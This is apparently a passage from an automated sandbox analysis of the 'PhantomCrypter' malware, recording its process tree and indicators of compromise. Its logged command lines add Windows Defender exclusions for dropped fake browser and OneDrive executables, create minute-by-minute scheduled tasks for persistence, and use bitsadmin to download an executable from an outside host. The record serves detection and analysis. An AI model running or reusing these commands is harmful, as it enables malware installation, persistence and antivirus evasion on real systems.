340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4900	TOPHERC.exe
4900	TOPHERC.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4900	TOPHERC.exe
4900	TOPHERC.exe
4900	TOPHERC.exe
4900	TOPHERC.exe
4900	TOPHERC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1424 wrote to memory of 2588	1424	PhantomCrypter.exe	77
PID 1424 wrote to memory of 2588	1424	PhantomCrypter.exe	77
PID 1424 wrote to memory of 3448	1424	PhantomCrypter.exe	78
PID 1424 wrote to memory of 3448	1424	PhantomCrypter.exe	78
PID 340 wrote to memory of 2804	340	chrome.exe	81
PID 340 wrote to memory of 2804	340	chrome.exe	81
PID 3448 wrote to memory of 3572	3448	PhantomCrypters.exe	83
PID 3448 wrote to memory of 3572	3448	PhantomCrypters.exe	83
PID 3448 wrote to memory of 4132	3448	PhantomCrypters.exe	84
PID 3448 wrote to memory of 4132	3448	PhantomCrypters.exe	84
PID 3448 wrote to memory of 4132	3448	PhantomCrypters.exe	84
PID 3448 wrote to memory of 1444	3448	PhantomCrypters.exe	85
PID 3448 wrote to memory of 1444	3448	PhantomCrypters.exe	85
PID 3448 wrote to memory of 3340	3448	PhantomCrypters.exe	86
PID 3448 wrote to memory of 3340	3448	PhantomCrypters.exe	86
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 4496	340	chrome.exe	87
PID 340 wrote to memory of 3032	340	chrome.exe	88
PID 340 wrote to memory of 3032	340	chrome.exe	88
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89
PID 340 wrote to memory of 3156	340	chrome.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe
  "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5732
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4892
- C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe
  "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3448
- - C:\Users\Admin\AppData\Roaming\Chrome Update.exe
    "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5700
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4828
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4132
  - - C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:1840
- - C:\Users\Admin\AppData\Roaming\msedge.exe
    "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5576
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5292
- - C:\Users\Admin\AppData\Roaming\OneDrive.exe
    "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5772
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5656
- - C:\Users\Admin\AppData\Roaming\TOPHERC.exe
    "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:4900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f260cc40,0x7ff9f260cc4c,0x7ff9f260cc58
  2⤵
  PID:2804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1816 /prefetch:2
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  PID:3032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2208 /prefetch:8
  2⤵
  PID:3156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2884,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2868,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4436 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4068,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5108,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:8
  2⤵
  PID:836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4052,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4448 /prefetch:8
  2⤵
  PID:1928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:8
  2⤵
  PID:1556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:8
  2⤵
  PID:5632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4508,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5116 /prefetch:8
  2⤵
  PID:2516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:3972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4676,i,6862040175070566487,8687639792719986503,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4496 /prefetch:2
  2⤵
  PID:2192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9ec5a3cb8,0x7ff9ec5a3cc8,0x7ff9ec5a3cd8
  2⤵
  PID:4688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:4040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2452 /prefetch:8
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:2644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
  2⤵
  PID:5796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
  2⤵
  PID:5804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6016
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
  2⤵
  PID:2528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:1
  2⤵
  PID:5476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
  2⤵
  PID:788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,2774038129546962919,7250816146767286172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:5556

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
